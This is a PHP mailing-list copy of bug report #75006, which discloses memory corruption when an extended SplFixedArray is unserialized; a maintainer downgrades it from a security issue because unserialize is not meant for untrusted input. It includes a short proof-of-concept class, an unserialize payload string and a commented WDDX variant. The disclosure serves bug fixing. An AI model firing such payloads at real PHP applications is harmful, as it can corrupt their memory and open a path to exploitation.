Sec Bug->Bug #75006 [Opn]: Memory Corruption in Extended SplFixedArray

From: Date: Wed, 02 Aug 2017 17:23:00 +0000
Subject: Sec Bug->Bug #75006 [Opn]: Memory Corruption in Extended SplFixedArray
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-210461@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=75006&edit=1 ID: 75006 Updated by: cmb@php.net Reported by: taoguangchen at icloud dot com Summary: Memory Corruption in Extended SplFixedArray Status: Open -Type: Security +Type: Bug Package: SPL related Operating System: * PHP Version: 5.6.31 Block user comment: N Private report: N Previous Comments: ------------------------------------------------------------------------ [2017-07-31 12:45:08] zeev@php.net Unserialize must not be used on untrusted input. We don't consider issues in unserialize as security vulnerabilities - removing Private flag... ------------------------------------------------------------------------ [2017-07-30 14:22:06] taoguangchen at icloud dot com Description: ------------ Memory Corruption in Extended SplFixedArray ``` SPL_METHOD(SplFixedArray, __wakeup) { spl_fixedarray_object *intern = (spl_fixedarray_object *) zend_object_store_get_object(getThis() TSRMLS_CC); HashPosition ptr; HashTable *intern_ht = zend_std_get_properties(getThis() TSRMLS_CC); ... zend_hash_clean(intern_ht); ``` An extended SplFixedArray can contains some properties. In during SplFixedArray deserialization, the deserialized properties will be cleaned. Then destructor call with uninitialized properties that result in memory corruption. PoC: ``` class obj extends SplFixedArray { var $prop; function __destruct() { if ($this->prop) { // doing whatever } } } unserialize('O:3:"obj":1:{s:4:"prop";i:1;}'); /* $wddx = <<<EOT <?xml version='1.0'?> <wddxPacket version='1.0'> <header/> <data> <struct> <var name='php_class_name'> <string>obj</string> </var> <var name='prop'> <number>1</number> </var> </struct> </data> </wddxPacket> EOT; wddx_deserialize($wddx); */ ``` ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=75006&edit=1

« previous php.bugs (#210461) next »